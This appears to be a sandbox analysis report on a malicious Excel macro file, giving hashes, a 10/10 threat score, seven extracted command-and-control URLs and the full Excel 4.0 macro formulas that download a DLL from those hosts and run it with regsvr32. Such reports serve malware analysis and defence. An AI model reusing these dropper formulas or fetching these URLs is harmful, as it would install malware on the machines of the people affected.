Overview

overview

10

Static

static

10

6c5a2a532d...7.xlsm

windows7-x64

10

6c5a2a532d...7.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    6c5a2a532dbe79594b62a08a41c14b1e71310b0d03c6ca604a5af2668c9d2987

  • Size

    73KB

  • Sample

    241121-a34dtswhje

  • MD5

    0592a3e99f4cd153a2296ecbf29a8319

  • SHA1

    f1c4dfb4d32dba0dd5443ed386fed794e022b838

  • SHA256

    6c5a2a532dbe79594b62a08a41c14b1e71310b0d03c6ca604a5af2668c9d2987

  • SHA512

    9cab1c308feb704b8035bf0f9c3cd48e658e50729701550de0db464dc28774302f40263f609a3608f0a19a64ed5dd9ee804384b969cd8185ed0b619cf54f2f6a

  • SSDEEP

    1536:I+1kiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlVq0iRq:I+1kiCtzSmICpH7OZuvZGsMe0/

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://fitfabtherapy.com/Untitled-1/AdRf0JsnyI/

http://almoiz.com/urdu/LDlbo5gc4c/

http://www.e-tactics.com/wordpress/wpau-backup/i8Sv/

http://avrworks.com/mail/tGJconiBvy59a81/

http://asave.com.mx/cgi-bin/CUa/

https://aquinoabogados.com.ar/newsletter/tx9KBb2j/

http://avcservices-tt.com/EANAPI/hswSV1/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://fitfabtherapy.com/Untitled-1/AdRf0JsnyI/","..\ujg.dll",0,0) =IF('EGDGB'!F7<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://almoiz.com/urdu/LDlbo5gc4c/","..\ujg.dll",0,0)) =IF('EGDGB'!F9<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.e-tactics.com/wordpress/wpau-backup/i8Sv/","..\ujg.dll",0,0)) =IF('EGDGB'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://avrworks.com/mail/tGJconiBvy59a81/","..\ujg.dll",0,0)) =IF('EGDGB'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://asave.com.mx/cgi-bin/CUa/","..\ujg.dll",0,0)) =IF('EGDGB'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aquinoabogados.com.ar/newsletter/tx9KBb2j/","..\ujg.dll",0,0)) =IF('EGDGB'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://avcservices-tt.com/EANAPI/hswSV1/","..\ujg.dll",0,0)) =IF('EGDGB'!F19<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ujg.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://fitfabtherapy.com/Untitled-1/AdRf0JsnyI/
xlm40.dropper

http://almoiz.com/urdu/LDlbo5gc4c/
xlm40.dropper

http://www.e-tactics.com/wordpress/wpau-backup/i8Sv/
xlm40.dropper

http://avrworks.com/mail/tGJconiBvy59a81/

Targets

    • Target

      6c5a2a532dbe79594b62a08a41c14b1e71310b0d03c6ca604a5af2668c9d2987

    • Size

      73KB

    • MD5

      0592a3e99f4cd153a2296ecbf29a8319

    • SHA1

      f1c4dfb4d32dba0dd5443ed386fed794e022b838

    • SHA256

      6c5a2a532dbe79594b62a08a41c14b1e71310b0d03c6ca604a5af2668c9d2987

    • SHA512

      9cab1c308feb704b8035bf0f9c3cd48e658e50729701550de0db464dc28774302f40263f609a3608f0a19a64ed5dd9ee804384b969cd8185ed0b619cf54f2f6a

    • SSDEEP

      1536:I+1kiXSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsMlVq0iRq:I+1kiCtzSmICpH7OZuvZGsMe0/

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks